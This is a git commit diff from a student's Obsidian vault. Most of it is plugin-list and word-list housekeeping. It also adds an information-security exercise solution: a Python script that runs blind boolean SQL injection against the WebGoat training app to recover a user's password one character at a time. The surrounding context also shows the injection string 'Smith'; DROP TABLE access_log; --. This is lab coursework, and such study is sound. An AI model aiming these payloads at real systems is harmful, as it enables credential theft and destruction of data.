vault backup: 2023-04-17 11:35:04

2023-04-17 11:35:04 +02:00
parent 3b43426b84
commit c88eab9e54
4 changed files with 61 additions and 28 deletions
--- a/.obsidian/community-plugins.json
+++ b/.obsidian/community-plugins.json
@@ -1,19 +1,23 @@
 [
-  "obsidian-livesync",
-  "obsidian-excalidraw-plugin",
+  "obsidian-git",
+  "obsidian-mind-map",
  "table-editor-obsidian",
  "calendar",
-  "code-block-copy",
-  "obsidian-dictionary-plugin",
-  "obsidian-dynamic-toc",
+  "obsidian-advanced-slides",
  "cm-editor-syntax-highlight-obsidian",
-  "obsidian-excel-to-markdown-table",
-  "juggl",
-  "obsidian-languagetool-plugin",
-  "obsidian-mind-map",
-  "nldates-obsidian",
-  "obsidian-git",
+  "code-block-copy",
  "url-into-selection",
+  "obsidian-dictionary-plugin",
+  "obsidian-languagetool-plugin",
+  "obsidian-image-toolkit",
  "quick-latex",
-  "obsidian-plugin-toc"
+  "obsidian-excel-to-markdown-table",
+  "obsidian-icons-plugin",
+  "juggl",
+  "obsidian-plugin-toc",
+  "drawio-obsidian",
+  "obsidian-completr",
+  "execute-code",
+  "nldates-obsidian",
+  "obsidian-livesync"
 ]
--- a/.obsidian/plugins/obsidian-completr/scanned_words.txt
+++ b/.obsidian/plugins/obsidian-completr/scanned_words.txt
@@ -3881,7 +3881,6 @@ DXL
 Daten
 Datenbank
 DROP
-Drawing
 xU
 xM
 xK
@@ -4841,8 +4840,6 @@ prA
 pdfTeX
 phone
 praktisch
-plugin
-parsed
 Ic
 IT
 Ir
@@ -5236,7 +5233,6 @@ and
 aktuelle
 access
 alles
-aaaaaaaaaaaaaaa
 fb
 fVVvD
 fh
@@ -5947,7 +5943,6 @@ exestierende
 eine
 einem
 egal
-excalidraw
 tj
 tg
 tt
@@ -6174,9 +6169,6 @@ tJWLG
 true
 tabelle
 test
-tags
-the
-this
 JFRO
 JG
 JL
@@ -6752,7 +6744,6 @@ EZw
 EUj
 EuQ
 Employee
-EXCALIDRAW
 lX
 ll
 lC
@@ -8322,7 +8313,6 @@ MNG
 MiNi
 Myl
 ModDate
-MORE
 qO
 qj
 qG
@@ -9111,7 +9101,6 @@ mma
 mKt
 mkb
 mDK
-menu
 dg
 dw
 de
@@ -9337,7 +9326,6 @@ das
 dafür
 dass
 den
-document
 VV
 VA
 Vsm
@@ -9550,7 +9538,6 @@ VHCh
 VbL
 Version
 Verändert
-VIEW
 SGN
 Sg
 SrEHO
@@ -9769,7 +9756,6 @@ SET
 Sales
 Struktur
 Smith
-Switch
 rn
 rE
 rD
@@ -10324,7 +10310,6 @@ OKh
 OdD
 OFV
 OQyO
-OPTIONS
 cgl
 cj
 content
--- a/.obsidian/workspace.json
+++ b/.obsidian/workspace.json
@@ -15,7 +15,7 @@
              "type": "markdown",
              "state": {
                "file": "Informationssicherheit/Ueb2/Ueb2.md",
-                "mode": "source",
+                "mode": "preview",
                "source": false
              }
            }
--- a/Informationssicherheit/Ueb2/Ueb2.md
+++ b/Informationssicherheit/Ueb2/Ueb2.md
@@ -96,3 +96,47 @@ Smith'; DROP TABLE access_log; --

 ### 2 

+```python
+import json  
+import requests  
+  
+def sql_injection_advance_5():  
+     alphabet_index = 0  
+     alphabet = 'abcdefghijklmnopqrstuvwxyz'  
+     password_index = 0  
+     password = ''  
+  
+     headers = {  
+        'Cookie': COOKIE,  
+     }  
+  
+     while True:  
+         payload = 'tom\' AND substring(password,{},1)=\'{}'.format(password_index + 1, alphabet[alphabet_index])  
+  
+         data = {  
+             'username_reg': payload,  
+             'email_reg': 'a@a',  
+             'password_reg': 'a',  
+             'confirm_password_reg': 'a'  
+         }  
+  
+         r = requests.put('http://HOST:PORT/WebGoat/SqlInjectionAdvanced/challenge', headers=headers, data=data)  
+  
+         try:  
+             response = json.loads(r.text)  
+         except:  
+             print("Wrong JSESSIONID, find it by looking at your requests once logged in.")  
+             return  
+  
+         if "already exists please try to register with a different username" not in response['feedback']:  
+             alphabet_index += 1  
+             if alphabet_index > len(alphabet) - 1:  
+                 return  
+         else:  
+             password += alphabet[alphabet_index]  
+             print(password)  
+             alphabet_index = 0  
+             password_index += 1  
+  
+sql_injection_advance_5()
+```